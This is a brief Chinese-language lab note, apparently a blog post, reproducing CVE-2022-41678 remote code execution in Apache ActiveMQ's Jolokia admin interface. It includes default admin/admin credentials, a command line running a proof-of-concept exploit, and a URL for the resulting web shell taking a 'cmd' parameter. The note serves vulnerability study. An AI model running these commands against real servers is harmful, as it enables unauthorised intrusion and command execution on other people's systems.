activemq-CVE-2022-41678

C9ccc002024-07-14 3:02

Apache ActiveMQ Jolokia 后台远程代码执行漏洞

Apache ActiveMQ在5.16.5,5.17.3版本及以前,后台Jolokia存在一处任意文件写入导致的远程代码执行漏洞。

启动环境

admin/admin

方法一:利用poc

这个方法受到ActiveMQ版本的限制,因为Log4j2是在5.17.0中才引入Apache ActiveMQ

方法二:

python poc.py -u admin -p admin --exploit jfr http://localhost:8161

http://192.168.62.131:8161/admin/shelljfr.jsp?cmd=id

相关推荐
恰薯条的屑海鸥3 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
喜欢吃燃面3 小时前
C++刷题:日期模拟(1)
c++·学习·算法
2301_797604244 小时前
学习记录:DAY32
学习
蓝婷儿5 小时前
6个月Python学习计划 Day 16 - 面向对象编程(OOP)基础
开发语言·python·学习
叶子2024225 小时前
学习使用YOLO的predict函数使用
人工智能·学习·yolo
jackson凌5 小时前
【Java学习笔记】SringBuffer类(重点)
java·笔记·学习
黑客老李7 小时前
JavaSec | SpringAOP 链学习分析
java·运维·服务器·开发语言·学习·apache·memcached
海的诗篇_7 小时前
移除元素-JavaScript【算法学习day.04】
javascript·学习·算法
傍晚冰川8 小时前
FreeRTOS任务调度过程vTaskStartScheduler()&任务设计和划分
开发语言·笔记·stm32·单片机·嵌入式硬件·学习
月初,8 小时前
MongoDB学习和应用(高效的非关系型数据库)
学习·mongodb·nosql
热门推荐
01【图像处理与机器视觉】XJTU期末考点02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03KGG转MP3工具|非KGM文件|解密音频04海康Visionmaster-常见问题排查方法-启动阶段05YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07Coze扣子平台完整体验和实践(附国内和国际版对比)08DeepSeek各版本说明与优缺点分析09VMware虚拟机安装Win7专业版保姆级教程(附镜像包)10坚果投影仪J10如何用苹果Siri开关机并和米家联动